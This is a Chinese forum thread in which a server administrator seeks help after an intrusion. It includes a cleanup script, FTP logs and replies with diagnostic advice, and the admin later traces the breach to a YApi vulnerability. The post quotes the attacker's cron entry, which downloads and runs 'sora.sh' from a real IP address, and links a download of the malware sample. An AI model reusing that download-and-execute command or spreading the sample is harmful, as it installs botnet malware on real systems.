服务器被入侵，删除病毒文件，只要开放22远程端口又马上出现病毒文件

Reer · 发表于 2021-9-23 18:58

服务器被入侵，使用clamscan扫描删除病毒文件，删除病毒相关文件，处理教程来自 https://blog.php110.top/home/index/detail/id/6923.html

!/bin/bash

rm -f /bin/netstat
rm -f /bin/ps
rm -f /usr/sbin/lsof
rm -f /usr/sbin/ss
rm -rf /usr/bin/dpkgd
rm -rf /usr/bin/bsd-port
rm -f /usr/bin/.sshd
rm -f /tmp/gates.lod
rm -f /tmp/moni.lod
rm -f /etc/rc.d/init.d/DbSecuritySpt
rm -f /etc/rc.d/rc1.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc2.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc3.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc4.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc5.d/S97DbSecuritySpt
rm -f /etc/rc.d/init.d/selinux
rm -f /etc/rc.d/rc1.d/S99selinux
rm -f /etc/rc.d/rc2.d/S99selinux
rm -f /etc/rc.d/rc3.d/S99selinux
rm -f /etc/rc.d/rc4.d/S99selinux
rm -f /etc/rc.d/rc5.d/S99selinux

后面发现留下定时任务

/30 cd /; wget http://209.141.45.139/bins/sora.sh; curl -O http://209.141.45.139/bins/sora.sh;chmod 777 ;sh sora.sh >/dev/null 2>&1

在/tmp 目录下存在病毒的运行程序。由于删除他好多遍之后，病毒运行文件名称改名“rini”,猜测自己中国人搞的，真是服了，有能力去搞搞外国，搞自己国家个测试服务器干嘛
javascript:;

这里附上病毒运行程序，希望哪位大神可以帮忙看一下。服务器密码已经改过好很多遍了，但还是只要开启22端口，病毒文件那些又全部进来了。

链接：https://pan.baidu.com/s/1RMzuoohkK-t4v4A1jy2yJA
提取码：7777

Reer · 发表于 2021-9-24 14:18

cutthesoul 发表于 2021-9-24 13:19
刚刚没细看，病毒文件是root用户组不代表一定是通过root账户登录后投放的。部分web组件是有提权漏洞的， ...

这个就难搞，把pure-ftpd也关了。message日志有很多
Sep 12 16:42:45 instance-h9dmdtvz pure-ftpd: (?@162.142.125.41) [INFO] New connection from 162.142.125.41
Sep 12 16:42:46 instance-h9dmdtvz pure-ftpd: (?@162.142.125.41) [INFO] Logout.
Sep 12 17:32:51 instance-h9dmdtvz pure-ftpd: (?@184.105.247.252) [INFO] New connection from 184.105.247.252
Sep 12 17:32:52 instance-h9dmdtvz pure-ftpd: (?@184.105.247.252) [INFO] Logout.
Sep 13 01:10:19 instance-h9dmdtvz pure-ftpd: (?@192.241.208.20) [INFO] New connection from 192.241.208.20
Sep 13 01:10:19 instance-h9dmdtvz pure-ftpd: (?@192.241.208.20) [INFO] Logout.
Sep 13 01:42:30 instance-h9dmdtvz pure-ftpd: (?@192.241.207.181) [INFO] New connection from 192.241.207.181
Sep 13 01:42:30 instance-h9dmdtvz pure-ftpd: (?@192.241.207.181) [INFO] Logout.
Sep 13 02:12:25 instance-h9dmdtvz pure-ftpd: (?@144.86.173.10) [INFO] New connection from 144.86.173.10
Sep 13 02:12:25 instance-h9dmdtvz pure-ftpd: (?@144.86.173.10) [INFO] Logout.

cutthesoul · 发表于 2021-9-24 13:19

Reer 发表于 2021-9-24 11:54
rm -f /usr/bin/.sshd
/root/.ssh/authorized_keys 文件是空的，

刚刚没细看，病毒文件是root用户组不代表一定是通过root账户登录后投放的。部分web组件是有提权漏洞的，如果这些文件的更改和修改时间，你确定没有其他账户通过ssh登录，更建议你排查下服务器对外开放的其他业务组件是否有提权漏洞

cutthesoul · 发表于 2021-9-24 11:40

.ssh目录下的免密公钥看了吗？

Reer · 发表于 2021-9-24 11:54

本帖最后由 Reer 于 2021-9-24 11:57 编辑

cutthesoul 发表于 2021-9-24 11:40
.ssh目录下的免密公钥看了吗？

rm -f /usr/bin/.sshd
/root/.ssh/authorized_keys 文件是空的，

kiopc · 发表于 2021-9-24 14:43

网盘里面这个是什么文件啊？打开之后怎么都是乱码啊

Reer · 发表于 2021-9-24 14:50

kiopc 发表于 2021-9-24 14:43
网盘里面这个是什么文件啊？打开之后怎么都是乱码啊

病毒程序文件，小心

kiopc · 发表于 2021-9-24 14:54

Reer 发表于 2021-9-24 14:50
病毒程序文件，小心

不知道为啥，打开之后是这种

flyjerry · 发表于 2021-10-20 13:29

乱码病毒么？

Reer · 发表于 2021-10-20 16:11

flyjerry 发表于 2021-10-20 13:29
乱码病毒么？

是的，能看出来跑了啥不，后面找到yapi漏洞进去的

帐号		自动登录	找回密码
密码			注册[Register]